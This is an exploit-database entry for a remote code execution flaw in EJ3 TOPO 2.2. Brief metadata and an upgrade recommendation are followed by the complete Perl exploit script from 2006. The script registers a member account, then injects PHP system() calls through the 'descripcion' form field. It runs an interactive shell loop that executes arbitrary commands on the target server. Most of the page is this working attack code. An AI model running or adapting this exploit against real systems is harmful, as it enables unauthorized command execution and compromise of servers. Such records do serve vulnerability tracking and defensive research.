EJ3 TOPO 2.2 Remote Code Execution Exploit

vendor:

TOPO

by:

Hessam-x

9,3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: TOPO

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:ej3_software:topo

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

EJ3 TOPO 2.2 Remote Code Execution Exploit

This exploit allows an attacker to execute arbitrary code on the vulnerable system. It is applicable to EJ3 TOPO version 2.2. The exploit is coded in Perl and uses LWP::UserAgent and HTTP::Cookies modules to create a user and execute the code.

Mitigation:

Upgrade to the latest version of EJ3 TOPO.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# EJ3 TOPO  2.2 Remote Code Execution Exploit
# --------------------------------------------- 
# Note : This Exploit Just run TOPO 2.2
# IHST : www.Hackerz.Ir 
# AST  : www.aria-security.net
###### (C)oded & Discovered By Hessam-x

use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;


 $host = $ARGV[0];

 $url = "http://".$host;

&hed;
    print " [~] Host : $host \n";
    print " [~] Conecting ...\n";


 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 $xpl->cookie_jar( $cookie_jar );
 
 $res = $xpl->post($url.'index.php',
 Content => [
 "email"   => "info@yahoo.com",
 "web"   => "Yahoo.Com",
 "webURL"   => "http://www.yahoo.com",
 "BannerURL"   => "http://www.yahoo.com/logo.jpg",
 "descripcion" => "YAHOO!INC",
 "country" => "as",
 "m" => "members",
 "s" => "html",
 "t" => "join",
 "paso" => "2",
 "ID" => "shell",
 ],);

 print " [+] Created a user ...\n";
 &run;
 

 
 sub hed()
{
 print q(
 ###########################################################
 #        EJ3 TOPO <= 2.1 Remote Code Execution Exploit    #
 #                                                         #
 ############# Coded & discovered By Hessam-x ##############

);

 
 if (@ARGV < 1) {
 print " #  usage : hx.pl [host&path]\n"; 
 print " #  E.g : hx.pl www.milw0rm.com/toplist/\n"; 
  exit();
 }
 
} 
 
    while ()
{
    &run
    }
  sub run()
 {  

      print "\n[Shell]\$";
      chomp($exc=<STDIN>);
    
        exit() if ($exc eq 'exit');

 
 
  $commd = "system(\"$exc\")";
  $cmd  = 'echo 1 ; echo _START_ ; '.$commd.' ; echo _END_';


 $req = $xpl->post($url.'index.php',
 Content => [
 "passwordNEW" => "0",
 "email"   => "info@yahoo.com",
 "webURL"   => "http://www.yahoo.com",
 "BannerURL"   => "http://www.yahoo.com/logo.jpg",
 "descripcion" => "YAHOO!INC' ;  $cmd ; ?>//",
 "country" => "unknow",
 "m" => "members",
 "s" => "html",
 "t" => "edit",
 "paso" => "2",
 "password" => "0",
 "ID" => "shell",
 ],);
 $res = $xpl->get($url.'index.php?m=top&s=out&ID=shell');
 @result = split(/\n/,$res->content);
 $runned = 0;
 $on = 0;
 print "\n";
 for $res(@result)
  {
    if ($res =~ /^_END_/) { print "\n"; return 0; }
    if ($on == 0) { print "  $res\n"; }
    if ($res =~ /^_START_/) { $on = 1; $runned = 1; } 
  }
    if (!$runned) { print "Can not execute command . EXPLOIT FAILED !\n" ; };
   
  
  
  }

# milw0rm.com [2006-07-10]